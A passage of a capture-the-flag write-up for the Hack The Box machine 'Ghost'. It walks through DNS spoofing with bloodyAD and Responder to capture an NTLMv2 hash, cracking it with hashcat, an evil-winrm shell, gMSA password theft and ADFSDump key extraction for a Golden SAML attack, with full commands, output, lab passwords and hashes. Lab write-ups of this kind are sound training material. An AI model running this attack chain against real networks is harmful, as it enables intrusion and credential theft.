                   iphelix@thesprawl.org  

(18:49:35) [*] DNSChef started on interface: 127.0.0.1
(18:49:35) [*] Using the following nameservers: 8.8.8.8
(18:49:35) [*] Cooking all A replies to point to 10.129.231.105
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.ghost.htb
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.ghost.htb.localdomain
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.ghost.htb
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.ghost.htb.localdomain
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.ghost.htb
(18:49:48) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.ghost.htb.localdomain
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.ghost.htb
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.ghost.htb.localdomain
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.ghost.htb
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.gc._msdcs.ghost.htb.localdomain
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.ghost.htb
(18:50:19) [*] 127.0.0.1: proxying the response of type 'SRV' for _kerberos._tcp.dc._msdcs.ghost.htb.localdomain
(18:50:19) [*] 127.0.0.1: cooking the response of type 'A' for dc01.ghost.htb to 10.129.231.105
(18:50:34) [*] 127.0.0.1: cooking the response of type 'A' for dc01.ghost.htb to 10.129.231.105
(18:50:42) [*] 127.0.0.1: cooking the response of type 'A' for linux-dev-ws01.ghost.htb to 10.129.231.105
(18:50:42) [*] 127.0.0.1: cooking the response of type 'A' for DC01.ghost.htb to 10.129.231.105

BloodHound:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ bloodhound-python -u 'florence.ramirez' -k -ns 127.0.0.1 -d ghost.htb -dc dc01.ghost.htb -c all --zip --use-ldap
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
Password: 
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Found 16 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: linux-dev-ws01.ghost.htb
INFO: Querying computer: DC01.ghost.htb
INFO: Ignoring host linux-dev-ws01.ghost.htb since its hostname does not match: Supplied hostname linux-dev-ws01.ghost.htb does not match reported hostnames dc01 or dc01.ghost.htb
INFO: Done in 00M 33S
INFO: Compressing output into 20250403185019_bloodhound.zip

One more thing, when prompted for the password I entered He!KA9oKVT3rL99j, the one we got earlier from our docker-entrypoint.sh execution in the environment variables.
As I started running out of ideas, I remember a discussion I saw earlier on the forum:

DNS Forum Discussion

We can see that DNS is not configured for BitBucket and that Justin (who is justin.bradley) is running a script against it. Then what we can do is add a DNS record for bitbucket.ghost.htb pointing to our IP as user florence.ramirez and therefore perform a DNS Spoofing attack. Lessgo:
We can do that using BloodyAD:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ python3 bloodyAD/bloodyAD.py -v INFO  -u 'florence.ramirez' -d 'ghost.htb' -k  --dc-ip 10.129.231.105 --host dc01.ghost.htb add dnsRecord bitbucket 10.10.16.25
[+] bitbucket has been successfully added
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ python3 bloodyAD/bloodyAD.py -v INFO  -u 'florence.ramirez'  -d 'ghost.htb' -k  --dc-ip 10.129.231.105 --host dc01.ghost.htb add dnsRecord bitbucket 10.10.16.25
[b'\x04\x00\x01\x00\x05\xf0\x00\x00\xf7\x00\x00\x00\x00\x00\x01,\x00\x00\x00\x00\x00\x00\x00\x00\n\n\x10\x19', b'\x04\x00\x01\x00\x05\xf0\x00\x00\xf7\x00\x00\x00\x00\x00\x01,\x00\x00\x00\x00\x00\x00\x00\x00\n\n\x10\x19']
Traceback (most recent call last):
  File "/home/kali/Hackthebox/GHost/bloodyAD/bloodyAD.py", line 5, in <module>
    main.main()
  File "/home/kali/Hackthebox/GHost/bloodyAD/bloodyAD/main.py", line 210, in main
    output = args.func(conn, **params)
             ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Hackthebox/GHost/bloodyAD/bloodyAD/cli_modules/add.py", line 196, in dnsRecord
    conn.ldap.bloodymodify(
  File "/home/kali/Hackthebox/GHost/bloodyAD/bloodyAD/network/ldap.py", line 301, in bloodymodify
    raise err
msldap.commons.exceptions.LDAPModifyException: LDAP Modify operation failed on DN DC=bitbucket,DC=ghost.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=ghost,DC=htb! Result code: "attributeOrValueExists" Reason: "b'00002083: AtrErr: DSID-03151E7F, #1:\n\t0: 00002083: DSID-03151E7F, problem 1006 (ATT_OR_VALUE_EXISTS), data 0, Att 9017e (dnsRecord)\n\x00'"

And looking at our Responder that we setup for listening:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ sudo responder -I tun0 -v  
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.25]
    Responder IPv6             [dead:beef:4::1017]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-J9N6LZMTXL3]
    Responder Domain Name      [L834.LOCAL]
    Responder DCE-RPC Port     [46909]

[+] Listening for events...                                                                      

[HTTP] Sending NTLM authentication request to 10.129.231.105
[HTTP] GET request from: ::ffff:10.129.231.105  URL: / 
[HTTP] NTLMv2 Client   : 10.129.231.105
[HTTP] NTLMv2 Username : ghost\justin.bradley
[HTTP] NTLMv2 Hash     : justin.bradley::ghost:4e13a224dcde8a9d:DE140DC10FDD8DB5B34373E9882173F6:01010000000000006E2AE55ED6A4DB01B8EA24C0AE23971A00000000020008004C0038003300340001001E00570049004E002D004A0039004E0036004C005A004D00540058004C003300040014004C003800330034002E004C004F00430041004C0003003400570049004E002D004A0039004E0036004C005A004D00540058004C0033002E004C003800330034002E004C004F00430041004C00050014004C003800330034002E004C004F00430041004C000800300030000000000000000000000000400000624B257BF30FAAE22CA34BCB530D545CB86AB0F5669A883DDCAE65BFDE9330010A001000000000000000000000000000000000000900300048005400540050002F006200690074006200750063006B00650074002E00670068006F00730074002E006800740062000000000000000000  

AND IT WORKED!!

Let’s now try to crack the hash:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 4800H with Radeon Graphics, 2212/4489 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

JUSTIN.BRADLEY::ghost:4e13a224dcde8a9d:de140dc10fdd8db5b34373e9882173f6:01010000000000006e2ae55ed6a4db01b8ea24c0ae23971a00000000020008004c0038003300340001001e00570049004e002d004a0039004e0036004c005a004d00540058004c003300040014004c003800330034002e004c004f00430041004c0003003400570049004e002d004a0039004e0036004c005a004d00540058004c0033002e004c003800330034002e004c004f00430041004c00050014004c003800330034002e004c004f00430041004c000800300030000000000000000000000000400000624b257bf30faae22ca34bcb530d545cb86ab0f5669a883ddcae65bfde9330010a001000000000000000000000000000000000000900300048005400540050002f006200690074006200750063006b00650074002e00670068006f00730074002e006800740062000000000000000000:Qwertyuiop1234$$
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JUSTIN.BRADLEY::ghost:4e13a224dcde8a9d:de140dc10fdd...000000
Time.Started.....: Thu Apr  3 20:27:59 2025 (12 secs)
Time.Estimated...: Thu Apr  3 20:28:11 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   874.8 kH/s (1.18ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10711040/14344385 (74.67%)
Rejected.........: 0/10711040 (0.00%)
Restore.Point....: 10708992/14344385 (74.66%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: R302521 -> Quemierda
Hardware.Mon.#1..: Util: 62%

Started: Thu Apr  3 20:27:58 2025
Stopped: Thu Apr  3 20:28:13 2025
                                  

JUSTIN.BRADLEY:Qwertyuiop1234$$

Let’s attempt to use this to login usin evil-winrm (which works in case the user is part of Remote Management Users group):

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ evil-winrm -i dc01.ghost.htb -u JUSTIN.BRADLEY -p 'Qwertyuiop1234$$'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                           
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                             
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\justin.bradley\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\justin.bradley\desktop> cat user.txt
550cea959f87ff4619c672b815a18faf
*Evil-WinRM* PS C:\Users\justin.bradley\desktop> 

And we got our user flag!

Privilege Escalation - ADFS abuse to RCE

ReadGMSAPassword abuse => access to adfs_gmsa$ account

Checking our BloodHound, we can see that justin.bradley can read gmsa passwords:

ReadGMSAPassword

We can read it directly this way:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ netexec ldap 10.129.231.105 -u justin.bradley -p 'Qwertyuiop1234$$' --gmsa
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB         10.129.231.105  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.231.105  636    DC01             [+] ghost.htb\justin.bradley:Qwertyuiop1234$$
LDAPS       10.129.231.105  636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.231.105  636    DC01             Account: adfs_gmsa$           NTLM: 9de4d086a1443bef82340604766d69c9 

And we can now login using that hash:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ evil-winrm -i dc01.ghost.htb -u adfs_gmsa$ -H 9de4d086a1443bef82340604766d69c9
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                           
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                             
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> whoami
ghost\adfs_gmsa$
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> 

Golden SAML attack

Golden SAML is a post-exploitation attack technique that allows an attacker to impersonate any user, including domain admins, by forging SAML authentication tokens. It is commonly used against Active Directory Federation Services (ADFS) environments.

First we’ll have to steal the ADFS token-signin certificate, for that we can use this ADFSDump.exe against our recently compromised account:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ evil-winrm -i dc01.ghost.htb -u adfs_gmsa$ -H 9de4d086a1443bef82340604766d69c9
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                           
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                             
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> upload ADFSDump.exe
                                        
Info: Uploading /home/kali/Hackthebox/GHost/ADFSDump.exe to C:\Users\adfs_gmsa$\Documents\ADFSDump.exe                                                                                            
                                        
Data: 40276 bytes of 40276 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> ./ADFSDump.exe
    ___    ____  ___________ ____
   /   |  / __ \/ ____/ ___// __ \__  ______ ___  ____
  / /| | / / / / /_   \__ \/ / / / / / / __ `__ \/ __ \
 / ___ |/ /_/ / __/  ___/ / /_/ / /_/ / / / / / / /_/ /
/_/  |_/_____/_/    /____/_____/\__,_/_/ /_/ /_/ .___/
                                              /_/
Created by @doughsec


## Extracting Private Key from Active Directory Store
[-] Domain is ghost.htb
[-] Private Key: FA-DB-3A-06-DD-CD-40-57-DD-41-7D-81-07-A0-F4-B3-14-FA-2B-6B-70-BB-BB-F5-28-A7-21-29-61-CB-21-C7


[-] Private Key: 8D-AC-A4-90-70-2B-3F-D6-08-D5-BC-35-A9-84-87-56-D2-FA-3B-7B-74-13-A3-C6-2C-58-A6-F4-58-FB-9D-A1


## Reading Encrypted Signing Key from Database
[-] Encrypted Token Signing Key Begin
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
[-] Encrypted Token Signing Key End

[-] Certificate value: 0818F900456D4642F29C6C88D26A59E5A7749EBC
[-] Store location value: CurrentUser
[-] Store name value: My

## Reading The Issuer Identifier
[-] Issuer Identifier: http://federation.ghost.htb/adfs/services/trust
[-] Detected AD FS 2019
[-] Uncharted territory! This might not work...
## Reading Relying Party Trust Information from Database
[-]
core.ghost.htb
 ==================
    Enabled: True
    Sign-In Protocol: SAML 2.0
    Sign-In Endpoint: https://core.ghost.htb:8443/adfs/saml/postResponse
    Signature Algorithm: http://www.w3.org/2001/04/xmldsig-more#rsa-sha256
    SamlResponseSignatureType: 1;
    Identifier: https://core.ghost.htb:8443
    Access Policy: <PolicyMetadata xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2012/04/ADFS">
  <RequireFreshAuthentication>false</RequireFreshAuthentication>
  <IssuanceAuthorizationRules>
    <Rule>
      <Conditions>
        <Condition i:type="AlwaysCondition">
          <Operator>IsPresent</Operator>
        </Condition>
      </Conditions>
    </Rule>
  </IssuanceAuthorizationRules>
</PolicyMetadata>


    Access Policy Parameter:

    Issuance Rules: @RuleTemplate = "LdapClaims"
@RuleName = "LdapClaims"
c:[Type == "http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname", Issuer == "AD AUTHORITY"]
 => issue(store = "Active Directory", types = ("http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn", "http://schemas.xmlsoap.org/claims/CommonName"), query = ";userPrincipalName,sAMAccountName;{0}", param = c.Value);


*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> 

Now this is only the Encrypted PFX alongside the Key. We will now copy the out private key and token signing key and convert them into a better format to be used later.

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ echo '8D-AC-A4-90-70-2B-3F-D6-08-D5-BC-35-A9-84-87-56-D2-FA-3B-7B-74-13-A3-C6-2C-58-A6-F4-58-FB-9D-A1' > private.txt
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/GHost]
